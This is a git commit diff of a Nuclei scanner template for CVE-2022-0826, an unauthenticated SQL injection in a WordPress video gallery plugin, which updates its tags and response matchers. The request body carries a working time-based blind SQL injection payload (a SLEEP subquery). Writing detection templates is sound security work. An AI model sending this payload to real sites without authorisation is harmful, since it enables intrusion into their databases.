Update CVE-2022-0826.yaml

patch-1
Ritik Chaddha 2022-12-05 11:31:29 +05:30 committed by GitHub
parent 10159089ac
commit bb4f42796f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 5 additions and 4 deletions

View File

@ -16,8 +16,8 @@ info:
cve-id: CVE-2022-0826
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-video-gallery-free,unauth
verified: true
tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,wp-video-gallery-free,unauth
requests:
- raw:
@ -28,11 +28,12 @@ requests:
Content-Type: application/x-www-form-urlencoded
action=wp_video_gallery_ajax_add_single_youtube&url=http://example.com/?x%26v=1%2522 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%2523
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- '(contains(body, "Registred videos :") || contains(body, "duplicate"))'
condition: and
- 'contains(body, "Registred videos :")'
condition: and